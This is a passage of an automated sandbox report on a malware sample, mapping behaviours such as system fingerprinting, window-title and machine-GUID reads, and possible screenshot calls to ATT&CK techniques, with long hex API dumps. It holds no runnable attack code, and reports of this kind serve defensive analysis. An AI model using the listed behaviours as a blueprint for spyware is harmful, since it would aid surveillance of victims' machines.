'4338008'}\" (UID: 00000000-00005040)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004612)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003404)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002088)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002736)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003320)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005040)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004612)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003580)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002756)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005064)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004808)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005216)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21b5501d01b55010016550100005201e414550188000000880000001768077798175501ff2b0777c56a2877a41b5501ac012a0000002a0000005201c06d520114009800d0040000c06d520150165501100000000000000015009300d0040000c06d5201 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb076c0dd2f000090fd7f9a5c087700f0fd7f60c612004490fd7f00000000400000003f000000200000000090fd7f54c61200c15c087760820f77200000000090fd7f9a5c087700f0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00003404)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bae01d01bae010016ae010000ab01e414ae018800000088000000176807779817ae01ff2b07778e612877a41bae01ac012700000027000000ab01c06dab011000ac00fb040000c06dab015016ae0110000000000000001100a700fb040000c06dab01 (UID: 00000000-00002520)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb07618fc2b0000f0fd7f9a5c087700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c087760820f772000000000f0fd7f9a5c087700e0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bd001d01bd0010016d0010000cd01e414d0018800000088000000176807779817d001ff2b0777d4512877a41bd001ac011b0000001b000000cd01c06dcd011200a20090050000c06dcd015016d001100000000000000013009d0090050000c06dcd01 (UID: 00000000-00002088)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb07620da1f0000a0fd7f9a5c087700f0fd7f60c6120044a0fd7f00000000400000003f0000002000000000a0fd7f54c61200c15c087760820f772000000000a0fd7f9a5c087700f0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00002088)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bcc01d01bcc010016cc010000c901e414cc018800000088000000176807779817cc01ff2b07772f532877a41bcc01ac012e0000002e000000c901c06dc9011000ac003c040000c06dc9015016cc0110000000000000001100a7003c040000c06dc901 (UID: 00000000-00002736)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bbd01d01bbd010016bd010000ba01e414bd018800000088000000176807779817bd01ff2b077756552877a41bbd01ac012100000021000000ba01c06dba011200a200d0040000c06dba015016bd01100000000000000013009d00d0040000c06dba01 (UID: 00000000-00003320)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bdd01d01bdd010016dd010000da01e414dd018800000088000000176807779817dd01ff2b0777a1422877a41bdd01ac011500000015000000da01c06dda0114009800ef010000c06dda015016dd01100000000000000015009300ef010000c06dda01 (UID: 00000000-00005040)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb076e8d619000060fd7f9a5c087700f0fd7f60c612004460fd7f00000000400000003f000000200000000060fd7f54c61200c15c087760820f77200000000060fd7f9a5c087700f0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00005040)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bee01d01bee010016ee010000eb01e414ee018800000088000000176807779817ee01ff2b0777813e2877a41bee01ac012700000027000000eb01c06deb011200a200ce040000c06deb015016ee01100000000000000013009d00ce040000c06deb01 (UID: 00000000-00004612)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb076f8dc2b0000f0fd7f9a5c087700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c087760820f772000000000f0fd7f9a5c087700e0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00004612)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a00100005a1b6b00581b6b0088156b00000068006c146b0088000000880000001768077720176b00ff2b07774c3e28772c1b6b00ac012c0000002c0000006800905b68001000ac00fb040000905b6800d8156b0010000000000000001100a700fb040000905b6800 (UID: 00000000-00003580)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bb701d01bb7010016b7010000b401e414b7018800000088000000176807779817b701ff2b077797322877a41bb701ac016000000060000000b401c06db4011200a2003c040000c06db4015016b701100000000000000013009d003c040000c06db401 (UID: 00000000-00002756)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21b4701d01b47010016470100004401e414470188000000880000001768077798174701ff2b07774e312877a41b4701ac0117000000170000004401c06d44011200a2003c040000c06d440150164701100000000000000013009d003c040000c06d4401 (UID: 00000000-00005064)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a00100005a1bb401581bb4018815b4010000b1016c14b4018800000088000000176807772017b401ff2b0777852828772c1bb401ac011e0000001e000000b101905bb1011000ac003c040000905bb101d815b40110000000000000001100a7003c040000905bb101 (UID: 00000000-00004808)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21b5c00d01b5c0000165c0000005900e4145c0088000000880000001768077798175c00ff2b0777562c2877a41b5c00ac012e0000002e0000005900c06d590014009800b3020000c06d590050165c00100000000000000015009300b3020000c06d5900 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bd201d01bd2010016d2010000cf01e414d2018800000088000000176807779817d201ff2b0777d6c72a77a41bd201ac011a0000001a000000cf01c06dcf0114009800b1020000c06dcf015016d201100000000000000015009300b1020000c06dcf01 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb07610ec1e0000f0fd7f9a5c087700e0fd7f60c6120044f0fd7f00000000400000003f0000001f00000000f0fd7f54c61200c15c087760820f771f00000000f0fd7f9a5c087700e0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bd501d01bd5010016d5010000d201e414d5018800000088000000176807779817d501ff2b07774f2d2877a41bd501ac011900000019000000d201c06dd201140098006d010000c06dd2015016d5011000000000000000150093006d010000c06dd201 (UID: 00000000-00005216)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb076d0fd1d000080fd7f9a5c087700f0fd7f60c612004480fd7f00000000400000003f000000200000000080fd7f54c61200c15c087760820f77200000000080fd7f9a5c087700f0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00005216)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21b7800d01b78000016780000007500e414780088000000880000001768077798177800ff2b07776a222877a41b7800ac0122000000220000007500c06d75001200a2003c040000c06d750050167800100000000000000013009d003c040000c06d7500 (UID: 00000000-00005060)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bd201d01bd2010016d2010000cf01e414d2018800000088000000176807779817d201ff2b077723192877a41bd201ac011f0000001f000000cf01c06dcf0114009800b1020000c06dcf015016d201100000000000000015009300b1020000c06dcf01 (UID: 00000000-00005116)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebb076909c230000b0fd7f9a5c087700f0fd7f60c6120044b0fd7f00000000400000003f0000002000000000b0fd7f54c61200c15c087760820f772000000000b0fd7f9a5c087700f0fd7f78c612005789077780830f7713172175d8ebb076 (UID: 00000000-00005116)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059077798010000a0010000d21bb501d01bb5010016b5010000b201e414b5018800000088000000176807779817b501ff2b0777e4122877a41bb501ac012c0000002c000000b201c06db2011200a20079030000c06db2015016b501100000000000000013009d0079030000c06db201 (UID: 00000000-00004768)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003404)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002088)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002736)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003320)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005040)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004612)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003580)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002756)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005064)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004808)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000944)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005216)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005060)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005116)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004768)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004716)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001340)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002904)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004120)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005240)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003492)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005136)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005404)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005344)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f0155501eea3a0720016550102000000707e2d00609ba0720c1655017d9ba072328a9a72cc042d0097a8a072020000000000000080042d00707e2d000816550194f9120094f912003ff29872f0155501c3a5a07200165501707e2d00c0e5967280042d0034000000d01b550100005201e02f5501c0e59672d8f91200dcf91200000000004e0200009cfa1200340000003400000017680777d81b550100000000435c0777016b28770016550124035201000052015001520193aba07200000000c06d52015c15550100000000707e2d004e02000000fa120050015201b7aba072 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000020092a0068da1200b3444b6c81d03075000000000000000000000000000000000000000000000000140100000000000000000000000000003df35a764c28597724df12005ecb2e751401000000000000005d2c7580e112000e5d2c7518dd1200dcaa3075010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ecf35a76f8da12006d82a87624bb2e0004010000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000330033003100390034006200380033003800300039006300630036006600300061006100350039006400390035003700640032006300370064003500350064003900340065006100370031006100650032003600660030003000630065003600650031002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b07773d542877d8ebb076ac012a0000002a0000000000000000000200f20092010000000000000000000000000000000000000300ed0092010000000000000000000038702a0000000000200000000000000000000000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f0001000000ffffffff0200000008000000c8cd2f00c8cd2f00c3cd2f000000000002000000b88f2c0000000000010000080000000068ec120095e10377b5833d00feffffffe0d912003f08ea7602000000b88f2c00000000000100001888fbe976d0d91200c81c3075a6db120095fbe97604db1200b88f2c000000000000000000000000008cda120000002a007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360018f35a764cda12006d82a87624bb2e0004010000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360070fa5a7664d312006d82a8764ce5300004010000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000e0372f00b8cf1200b3444b6c81d0307500000000000000000000000000000000000000000000000070010000000000000000000000000000ede65a763c3d597774d412005ecb2e757001000000000000005d2c75d0d612000e5d2c7568d21200dcaa307501000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001cf95a7648d012006d82a87614ea300004010000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000800000008102f0008102f0003102f000000000030ec300000002a0038702a0102000000b88f2c000000000001000008b5833d00feffffffbcc70f77c0c70f770a0000000010000000002a0000ea3000f83b0000ff07000000002a00000000007f070000c4002a0008302a00bc2200005ccf120067e5047700002a0000ea30000000000000002a00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360048e65a769ccf12006d82a876a4ea300004010000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a0012000000aa0000000000000000000000404c2c00286d2a00906e2a0060da2e0040792a0033005f0040cc12002e00650048d9120060da2e00e9e9077760da2e0000000000aa0000006ccd1200a4d11200000000000000000000000000000000000000000000000000e019000000002a001c5c067760d82075ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096ed077782da2e00a06add74860000006ccd1200a4d112000000000086008800a06add746ccd1200916cdd7482da2e00a06add74a06add74dcd1120002020000 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"IsWow64Process\" with parameter \"3404\" - (UID: 00000000-00003404)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"2520\" - (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"2088\" - (UID: 00000000-00002088)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"5040\" - (UID: 00000000-00005040)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"4612\" - (UID: 00000000-00004612)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"5216\" - (UID: 00000000-00005216)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"5116\" - (UID: 00000000-00005116)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"3492\" - (UID: 00000000-00003492)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"D3_08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"IExplorer.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"LSASS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"SMSS.EXE\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003404)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002088)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"GetWindowTextA\" (UID: 00000000-00003404)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00002520)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00002088)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"D3_08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"IExplorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"13010b68\"\n \"cx\": \"16\"\n \"cy\": \"16\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called 